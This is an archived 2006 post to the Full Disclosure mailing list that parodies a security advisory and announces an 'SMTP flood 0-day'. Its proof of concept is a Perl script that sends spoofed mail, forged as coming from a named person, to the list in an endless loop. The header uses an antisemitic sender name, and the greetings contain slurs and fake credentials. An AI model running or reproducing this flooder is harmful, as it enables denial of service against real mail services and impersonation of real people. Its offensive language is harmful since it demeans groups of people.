Full Disclosure mailing list archives
Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
From: "3 3" <nazijew () gmail com>
Date: Fri, 17 Mar 2006 17:27:49 -0500
Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit ========== 1. Description ========== It is possible to flood Full Disclosure Mailing List via the SMTP protocol, causing possible buffer overflow, probable disk write failure, and definate DoS. ========== 2. Solution ========== The clear solution, as per Bantown security, is to moderate all mailing lists for an until the ESMTP MTA developers can reach a better solution. ========== 3. History ========== Mar 13, 2006 [+] Vendor Notification. Mar 13, 2006 [+] Public Disclosure. ========== 4. PoC ========== #!/usr/bin/perl # # SMTP FLOOD PoC # by Jmax, Bantown Security, INC. # # greetz 2 # weev, hep, hugparty, bob, tosh, choob, # krade, the church of jesus christ of latter-day saints, # n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT, # u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED. use warnings; use strict; use Mail::Sendmail; my %mail = ( from => 'ge () linuxbox org', to => 'full-disclosure () lists grok org uk', subject => 'SMTP FLOOD PoC', ); while (1) { sendmail(%mail); } ========== A. References ========== RFC 821 ========== B. Contact ========== Jmax, Bantown Security, INC. lolville () spam la 1-888-565-9428 GSAE GREM SSP-CNSA CAP SSCP
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit 3 3 (Mar 17)
- <Possible follow-ups>
- Fwd: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit n3td3v (Mar 17)